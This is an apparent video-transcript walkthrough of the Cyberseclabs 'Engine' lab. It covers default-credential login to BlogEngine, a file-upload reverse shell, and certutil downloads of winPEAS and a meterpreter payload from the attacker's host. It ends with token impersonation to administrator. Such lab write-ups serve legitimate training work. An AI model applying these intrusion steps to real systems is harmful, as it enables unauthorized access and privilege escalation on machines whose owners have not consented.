Alright, today we'll be doing engine from Cyberseclabs, and this is a really nice platform. Actually, I really like it a lot. So we're gonna get started, and I already turned on the machine, but we're just gonna do our nmap scan, SCSV, and we'll see what shows up. Alright, the nmap scan's done, and we can see port 80 Microsoft IIS, and we can check that out. Looks like it also has SMB, so we can just go check out that port 80 first. That's usually what I do. Alright, why don't we run a dirsearch on that? And this was when I was doing it in Eternal on Cyberseclabs, so yeah, let's go over dirsearch. If you guys don't have dirsearch, I'll leave a link to that in the description. I like it a lot, so let's just do that. We'll do -E for extensions. We can do status, and then we can recursive. We could also do threads 100, and we'll let that run, see if it finds anything. And yeah, let's hope that runs. We can also, while that's running, it's already found some stuff, but we can just see what's on, see if we can see any shares. And as you can see, we don't really see any. That's fine. And you can see it's actually done already. It found /blog. So let's go over to blog. Okay, let's see if we can see a blog. Powered by BlogEngine. We can see if there's any sort of exploit for that. So let's just go out BlogEngine exploits. You can already see a couple shows up. We can take a look at these, but yeah. Alright, so this one looks like there might be an admin page here, because here it says admin. We can see if we can see that, and we don't see one, but if we add blog admin, something will show up. As you can see, BlogEngine. As for the username and password, we can just try a default credential, admin, and you can see we're logged in now. So let's go over here to about. We can see the version is 3.3.6.0, and that's the same as this one over here. So this exploit is probably going to work. It wants us to come to this admin page, admin, app, editor, edit post, and we just do that. So let's go over here, blog, admin, app, editor, edit posts.sh HTML. Okay, and you can see here, it looks like there's a file manager, so we might be able to upload some files. So let's just come over here back to our exploit, see what it tells us. By editing a post and clicking on the icon that looks like a file in the toolbar. So that's this one right here. And note that this file must be uploaded as postview.ascx. So once uploaded, the file will be in app data files directory off of the document root. The admin page that allows this upload is this. So we can just copy this, and yep, we just copy that, and remember it must be named postview.ascx. So let's just do that. We can do, let's go to my walkthrough directory, clear that. We can do nano postview ascx, zoom in, paste that. See if we have to edit anything. Let's go over here. We have our IP address and port, so we can change that to our IP address. So 10.10.098. For the port, we can just do 1234. It can be anything. So let's just do that. Now that we have it, we can try to upload it. But once we upload it, the vulnerability is triggered by accessing the base URL for the blog with the theme override specified like so. So I guess we have to go over here, and that will execute the file. So let's upload that. It's in walkthrough. Here we go. Completed. I guess that's done now. Yeah, we didn't get any errors, so I guess it works. So we can just check that out. We can change the IP address to, where is it? Engine. So it's 172.31.116. Just copy and paste that. Not at the end. We can come over here. Okay, I forgot to netcat to the port, but it should work. Did it give me anything? /blog. Okay, and we got something. Okay, so we just do a who am I. Alright, so we are not NT authority system yet. We can try to do some privilege escalation. So we can do winPEAS. So yeah, let's just upload that. Oops. Alright, so winPEAS, I think I have that in my downloads folder. And if you don't have it, I'll leave a link to that in the description. So we can just do pyweb.sh. That's for me. If you don't have it, you can just do sudo python -m simple http server on port 80. So you can just do that, and we can transfer that over with cert util. So it's pretty much wget on Windows. Let's do cert util url cache f http :// RIP address, which is 10.10.098 on port 80, and it's called winPEAS.exe, and we can just call it winPEAS.exe over here. But I just realized we're in a weird directory, so we can actually cd out of this. Just try to go to a users dir cd alex. Okay, so I guess we can't access Alex, but we can't go to public. Hopefully there. Yeah, we can go there. Okay, so let's just go into documents, and yeah, there's nothing in here. So yeah, we can just do cert util url cache f http :// your IP address 10.10.098 port 80 winPEAS.exe, and we can call that winPEAS.exe. So let's hope that grabs it. Yes, maybe. Oh, I spelled it wrong. Okay, so let's do cert util again. Port 80 winPEAS.exe winPEAS.exe, and that should work. Okay, yeah, it grabbed it, so it worked. We can do dir, and you see winPEAS.exe. So we can actually just run winPEAS right now. winPEAS.exe, just like that. And we'll just let that run. So the things in red indicates a special privilege over an object or something that might be misconfigured. So we should be checking out those red stuff. You can see some auto login credentials were found. Some more possible DLL hijacking, but yeah, let's just keep letting it run. What else is there? Okay. You should try to search this file for credentials, unattended files. We'll just keep letting that run. See if it finds anything else for us. While that runs, we can also just cancel out this. Alright, so we can let winPEAS run, and we can just start looking at some of these. Looks like we see some something that's good. Users impersonate a user. So we can actually try that right now. Impersonating user, but we'll need to get a meterpreter session. So what we can do is just use MSF Venom. We can generate a payload, and we'll just use multi-handler to get a meterpreter session. So let's do that. So we can just come over here. If you guys want, you can come over here to pentest.ws. It's free. You just come over here to Venom Builder. Let's just do Windows meterpreter reverse TCP. So this one. L host, we can just do that. L port, we can leave it at 4321. Exe, yep. And we can just call that shell.exe, and you can just generate a payload like this. So let's just come over here. Go to my walkthrough directory, clear, and we'll just generate that payload. And yeah, let's just see if we can impersonate a user, and if that doesn't work, we'll start looking at some of the other things. Alright, so once that's done, we can just do cert util again, ls, and you can see it's right here, shell.exe. So let's just start up a web server, again sudo -m simple HTTP server on port 80. We can just do cert util url cache -f http:// 10.10.098 on port 80, and we call that shell.exe, and we can just put it here and call it shell.exe. Okay, see, it grabbed it, so that worked. And is that done? Shell.exe. Alright, so that worked. Let's come over here, go to MSF console, and we can start using multi-handler and hope that gives us a meterpreter session. So let's just start up Metasploit. And Metasploit's up, so let's just do use multi-handler, clear, show options. We can set our payload to be Windows meterpreter reverse TCP. Set L host to 10.10.098, set L port to 4321. And just show options just to make sure everything's correct. And looks like everything's right. So let's just do run. And now we can do, yep, it's here. So let's just do shell.exe. And we have a meterpreter session opened. Right. Alright, so just do get UID first. Okay. Alright, so let's just do load incognito. Alright, so once that works, we can start listing our tokens, and if we just do help incognito command, so you start listing tokens. And yeah, so let's do list tokens. You can see you have to add in a -g or -u. List tokens by unique group name or unique username. Let's just do list tokens by unique group name. And impersonation tokens available. We can actually see one right here, NT authority local account. So to impersonate a token, all we really need to do is do impersonate token, and in this, but we probably want to put it around quotes because there's some spaces. So let's see if that works. Alright, successfully impersonate engine administrator. So let's do get UID. We are engine administrator. So let's back out of this, and let's see if we can go into administrator. And yep, we can. We go over here, desktop, and you have your system.txt right here. So that's your flag. You guys can go grab that. And yeah, this is the root engine. It's really nice. It's on Cyberseclabs, and you guys should really check that out. It's a great platform. And I hope you guys enjoyed this video. And yeah, I'll see you guys in the next one.